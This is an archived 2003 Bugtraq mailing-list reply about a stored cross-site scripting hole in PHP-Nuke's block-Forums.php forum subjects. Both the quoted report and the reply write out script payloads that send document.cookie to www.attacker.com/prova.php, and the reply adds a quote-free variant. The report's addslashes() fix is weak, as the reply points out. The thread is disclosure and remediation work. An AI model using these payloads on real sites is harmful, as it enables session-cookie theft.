I haven't tested but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or ", like this : "> <name=a><input type=hidden name=u value=http://www.attacker.com/prova.php></form> <script>window.open(document.a.u.value+document.cookie)</script> What do you think about : $title2 = htmlspecialchars($title2, ENT_QUOTES); >From: <lethalmanat_private> >To: bugtraqat_private >Subject: PHP-Nuke block-Forums.php subject vulnerabilities >Date: 31 Mar 2003 11:15:54 -0000 > > > >The block-Forums.php file have a vuln if an attacker >insert a malformatted subject to a topic of Splatt >Forum. A type of subject is: > >"><script>alert('bug'");</script> > >The 'alt' tag is closed by "> and the other text is >normal html. This bug is very bad if a subject is: > >"><script>window.open('www.attacker.com/prova.php?cookie='+document.cookie);</script> > >And prova.php register cokkies in a file. > >The solution: > >Add under "$title2 = stripslashes($title2);" line, this >line: >"$title2 = addslashes($title2);" > >And now, backward any " there is a backslash! -------------------------- frog-m@n http://www.phpsecure.info _________________________________________________________________
This archive was generated by hypermail 2b30 : Wed Apr 02 2003 - 14:21:39 PST